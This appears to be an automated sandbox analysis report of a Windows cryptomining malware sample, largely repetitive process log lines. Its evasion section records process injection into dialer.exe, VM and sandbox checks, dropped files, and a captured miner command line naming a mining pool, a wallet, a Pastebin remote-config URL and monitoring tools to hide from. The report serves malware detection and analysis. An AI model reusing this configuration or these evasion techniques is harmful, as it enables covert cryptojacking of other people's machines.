Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dialer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,		14_2_00007FF68D3D10C0
Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,		42_2_00007FF6429510C0

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\dialer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dialer.exe, 00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEXEXE
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\DIALER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=42W7YGWWRGZPFZQCD5CDZUFLYRRXLKFURCSEPKBE7W8Z1A8KJXJR4B1YC5CHI7OQBFICW1KZSPEHQQQEO2I4NPRFCVXRUKS--PASS=--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=LIBTQLIBDOYD.SYS--CINIT-REMOTE-CONFIG=HTTPS://PASTEBIN.COM/RAW/MJDPKDHR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.3.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=QQGNFENFEMXXTPHAJ
Source: dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HTTPS://PASTEBIN.COM/RAW/MJDPKDHRTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEQQGNFENFEMXXTPHA
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLLLRSHELL\M:MV
Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE<
Source: dialer.exe, 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: XMR-EU1.NANOPOOL.ORG4BBOENU9KW6ZOTG5ESVMXP238BVUTGISGCAQ7VSKCKVSN9OVZKRJDSH6J1B2UVJ7DQJ4QFMEZDIXRG6SSP8PR2Y87CUKQ9DSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXESTEALTH-FULLSCREENALGO
Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5273	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4584	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 9999	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9932	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7659	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2012	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9872	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1804

Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\bzqlyietdwsj.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\libtqlibdoyd.sys	Jump to dropped file

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_27-22930
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_30-15146

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_14-425

Source: C:\Windows\System32\lsass.exe	API coverage: 3.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.6 %

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe TID: 2936	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480	Thread sleep count: 5273 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480	Thread sleep count: 4584 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 5664	Thread sleep count: 9999 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 5664	Thread sleep time: -9999000s >= -30000s	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe TID: 5292	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 1208	Thread sleep count: 9932 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 1208	Thread sleep time: -9932000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep count: 7659 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164	Thread sleep count: 2012 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5872	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5872	Thread sleep time: -241000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 3532	Thread sleep count: 9872 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 3532	Thread sleep time: -9872000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 5348	Thread sleep count: 1804 > 30
Source: C:\Windows\System32\dialer.exe TID: 5348	Thread sleep time: -180400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4932	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 4932	Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 3960	Thread sleep time: -95000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3164	Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 3164	Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5368	Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 5368	Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5396	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 5396	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4372	Thread sleep count: 200 > 30
Source: C:\Windows\System32\svchost.exe TID: 4372	Thread sleep time: -200000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964	Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 6964	Thread sleep time: -252000s >= -30000s

Source: C:\Windows\System32\dialer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165EDCE0 FindFirstFileExW,	23_2_000002D0165EDCE0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F151DCE0 FindFirstFileExW,	27_2_000002D6F151DCE0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F157DCE0 FindFirstFileExW,	27_2_000002D6F157DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FDDCE0 FindFirstFileExW,	30_2_0000014E41FDDCE0
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B08DCE0 FindFirstFileExW,	31_2_000001D15B08DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32EDCE0 FindFirstFileExW,	46_2_0000023AF32EDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD9DCE0 FindFirstFileExW,	50_2_0000023C9FD9DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA71DCE0 FindFirstFileExW,	51_2_000001A1CA71DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE6DCE0 FindFirstFileExW,	53_2_00000246EDE6DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19BDCE0 FindFirstFileExW,	54_2_00000200A19BDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_000002259668DCE0 FindFirstFileExW,	55_2_000002259668DCE0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

